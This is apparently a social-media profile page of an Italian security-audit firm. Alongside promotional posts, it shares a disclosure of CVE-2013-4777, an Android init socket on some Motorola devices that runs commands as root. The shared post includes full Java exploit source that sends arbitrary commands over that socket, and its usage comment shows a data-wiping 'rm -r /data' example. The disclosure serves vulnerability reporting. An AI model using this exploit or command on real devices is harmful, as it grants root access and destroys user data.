Profile cover photo
Profile photo
EasyAudit Italia
24 followers -
EasyAudit è la verifica della sicurezza informatica per le imprese
EasyAudit è la verifica della sicurezza informatica per le imprese

24 followers
About
EasyAudit Italia's posts

Post has attachment

Post has attachment
Storie d’ordinaria insicurezza: Clickjacking, Pharming e Pishing http://ow.ly/p0HZJ

Post has shared content
Debug/test feature in init allows any user to execute shell commands as the root user on some Motorola and Sharp devices.

Lets see if we can bump my embarrassing presentation further down the page...

This vulnerability is being published now as the responsible parties have informed me that it will not be fixed due to no planned updates for the device. Very few devices are affected, seems to be limited to one small carrier (Republic Wireless) in the US.

 At boot time init creates a socket at /dev/socket/init_runit, and accepts shell commands. When a command is sent, init executes the command as the root user.

CVE: CVE-2013-4777

Affected Devices:
    Motorola Defy XT - Republic Wireless
    Probably others

The responsible parties for this have informed me that this issue will not be fixed due to the age of the affected device. Initial disclosure was July 9th 2013.



package com.cunninglogic.arsenic;

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

import android.net.LocalSocket;
import android.net.LocalSocketAddress;
import android.util.Log;

public class SocketComm {
    static String TAG = "Arsenic";
    static byte[] buf = new byte[0x400];
    int buflen = 0;
    static InputStream mIn;
    static OutputStream mOut;
    static LocalSocket mSocket;
    
    /* Arsenic for Motorola Defy XT (Republic Wireless) and others
     * By: jcase@cunninglogic.com
     * Usage:
     * SocketComm.execCommand("/system/bin/rm -r /data");
     * 
     */
    
    public static boolean execCommand (String command) {
    boolean success = false;
    if (connect()){
    byte[] bytesCommand = command.getBytes();
    int i = bytesCommand.length;
    if(i >= 1 && i <= 1024) {
    buf[0] = (byte)(i & 255);
    buf[1] = (byte)(i >> 8 & 255);
   
    try {
mOut.write(buf, 0, 2);
mOut.write(bytesCommand, 0, i);
} catch (IOException e) {
Log.e(TAG, "command error");
disconnect();
success = false;
}
    }
    }

    return success;
    }
    
    private static boolean connect() {
boolean isConnected = true;
   
if (mSocket == null) {
mSocket = new LocalSocket();
LocalSocketAddress mAddress = new LocalSocketAddress("init_runit",LocalSocketAddress.Namespace.RESERVED);
try {
mSocket.connect(mAddress);
mIn = mSocket.getInputStream();
mOut = mSocket.getOutputStream();
isConnected = true;
} catch (IOException e) {
isConnected = false;
e.printStackTrace();
}
}
return isConnected;
    }
    
   @SuppressWarnings("null")
private static void disconnect() {
    LocalSocket socket = null;
    try {
   
    if(mSocket != null){
    mSocket.close();
    }
   
    if(mIn != null){
    mIn.close();
    }
   
    if(mOut != null){
    mOut.close();
    }    
   
    mSocket = socket;
    mIn = socket.getInputStream();
    mOut = socket.getOutputStream();
   
} catch (IOException e) {
e.printStackTrace();
}
   
    }
    
}

Post has attachment

Post has attachment
Disponibile online il nuovo White Paper I rischi di sicurezza per gli E-Commerce, che illustra alcune delle problematiche in caso di compromissione del proprio sito web. http://ow.ly/p0HCi

Post has attachment

Easyaudit: la ricetta vincente per la sicurezza informatica

Gli attacchi informatici diventano sempre più numerosi (+42% nel solo 2012), tanto che già da tempo le imprese di maggiori dimensioni sono state costrette a dotarsi di sistemi di sicurezza.

Post has attachment

Post has attachment
Wait while more posts are being loaded